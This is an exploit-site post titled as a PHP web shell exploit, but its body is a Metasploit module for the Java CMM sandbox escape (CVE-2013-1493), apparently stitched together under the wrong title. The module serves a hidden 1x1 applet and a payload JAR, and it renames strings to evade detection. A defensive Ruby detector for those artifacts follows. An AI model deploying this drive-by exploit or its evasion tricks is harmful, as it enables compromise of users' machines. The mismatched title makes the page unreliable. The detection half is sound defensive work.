
STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled exploit classes shipped with the framework and give the
  # applet entry class a random name so the served JAR differs on every run.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # Three request paths: the JAR (exploit classes plus payload), the landing page
  # carrying the <applet> tag, and a redirect to the landing page for anything else.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the framework's fixed strings in entry names and contents so the
      # JAR does not carry obvious "metasploit"/"Payload" markers.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive name is random per request and
  # whose entry class is the renamed Init class.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
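From the defender's side, the module above leaves two stable artifacts that the per-run randomization does not touch: the landing page is an <applet> tag sized 1x1 loading a .jar, and the served JAR always contains Leak.class, MyBufferedImage.class and MyColorSpace.class (only the Init class and the "metasploit"/"Payload" strings are renamed). The following is an added example, not part of the post or of the Metasploit module, that checks captured HTML for hidden applet tags and walks a JAR's central directory for those fixed class names. The HTML sample and the in-memory JAR builder are constructed here for illustration; a real check would run over captured responses or proxy logs.

```ruby
require 'zlib'

# Class names the module bundles unchanged into every JAR (from the module code).
CMM_JAR_MARKERS = %w[Leak.class MyBufferedImage.class MyColorSpace.class].freeze

LOCAL_SIG = "PK\x03\x04".b
CDIR_SIG  = "PK\x01\x02".b
EOCD_SIG  = "PK\x05\x06".b

# Return the attribute strings of <applet> tags that load a .jar and are sized
# to be invisible (width and height of at most 1 pixel), as the module's page is.
def suspicious_applets(html)
  html.scan(/<applet\b([^>]*)>/i).map(&:first).select do |attrs|
    archive = attrs[/archive\s*=\s*["']([^"']+)["']/i, 1]
    width   = attrs[/width\s*=\s*["']?(\d+)/i, 1].to_i
    height  = attrs[/height\s*=\s*["']?(\d+)/i, 1].to_i
    archive && archive.downcase.end_with?('.jar') && width <= 1 && height <= 1
  end
end

# List entry names of a ZIP/JAR by walking the central directory. The central
# directory is used rather than local headers because streamed archives may
# leave local sizes as zero (data-descriptor flag), which would break a walk.
def zip_entry_names(bytes)
  bytes = bytes.b
  eocd = bytes.rindex(EOCD_SIG)
  raise ArgumentError, 'no end-of-central-directory record' unless eocd
  # EOCD: sig(4) disk(2) cd_disk(2) n_disk(2) n_total(2) cd_size(4) cd_off(4) clen(2)
  _, _, _, _, total, _cd_size, cd_off = bytes[eocd, 22].unpack('a4v4V2v')
  names = []
  off = cd_off
  total.times do
    break unless bytes[off, 4] == CDIR_SIG
    # central header: sig(4) made(2) need(2) flags(2) method(2) time(2) date(2)
    #   crc(4) csize(4) usize(4) nlen(2) xlen(2) clen(2) disk(2) iattr(2) eattr(4) lhoff(4)
    f = bytes[off, 46].unpack('a4v6V3v5V2')
    nlen, xlen, clen = f[10], f[11], f[12]
    # Names are treated as UTF-8; CP437 names (flag bit 11 clear) only matter for non-ASCII.
    names << bytes[off + 46, nlen].force_encoding(Encoding::UTF_8)
    off += 46 + nlen + xlen + clen
  end
  names
end

# Flag a JAR when at least two of the fixed CVE-2013-1493 class names are present.
def assess_jar(bytes)
  names = zip_entry_names(bytes)
  hits = names & CMM_JAR_MARKERS
  { entries: names, markers: hits, suspicious: hits.size >= 2 }
end

# Constructed helper: build a minimal "stored" (uncompressed) ZIP from a
# name => data hash, so the checker can be exercised without a real exploit JAR.
def build_stored_jar(files)
  local   = String.new(encoding: Encoding::BINARY)
  central = String.new(encoding: Encoding::BINARY)
  files.each do |name, data|
    name = name.b
    data = data.b
    crc = Zlib.crc32(data)
    offset = local.bytesize
    local << [LOCAL_SIG, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
              name.bytesize, 0].pack('a4v5V3v2') << name << data
    central << [CDIR_SIG, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                name.bytesize, 0, 0, 0, 0, 0, offset].pack('a4v6V3v5V2') << name
  end
  eocd = [EOCD_SIG, 0, 0, files.size, files.size, central.bytesize,
          local.bytesize, 0].pack('a4v4V2v')
  local + central + eocd
end

# Constructed sample of the landing page the module emits (random archive and class names).
SAMPLE_HTML = '<html><head><title>Loading, Please Wait...</title></head>' \
              '<body><center><p>Loading, Please Wait...</p></center>' \
              '<applet archive="qZxTbnLw.jar" code="Ksdq.class" width="1" height="1">' \
              '</applet></body></html>'

if __FILE__ == $0
  puts "hidden applets: #{suspicious_applets(SAMPLE_HTML).size}"
  jar = build_stored_jar('Ksdq.class' => "\xCA\xFE\xBA\xBE".b, 'Leak.class' => 'x',
                         'MyBufferedImage.class' => 'y', 'MyColorSpace.class' => 'z',
                         'META-INF/MANIFEST.MF' => "Manifest-Version: 1.0\n")
  p assess_jar(jar)
end
```

The applet check on its own is noisy (legitimate pages rarely use 1x1 applets, but drive-by kits of the period did, so it is a kit indicator rather than a CVE indicator); the JAR class names are the specific signal for this module, and the threshold of two markers tolerates a kit dropping or renaming one of them.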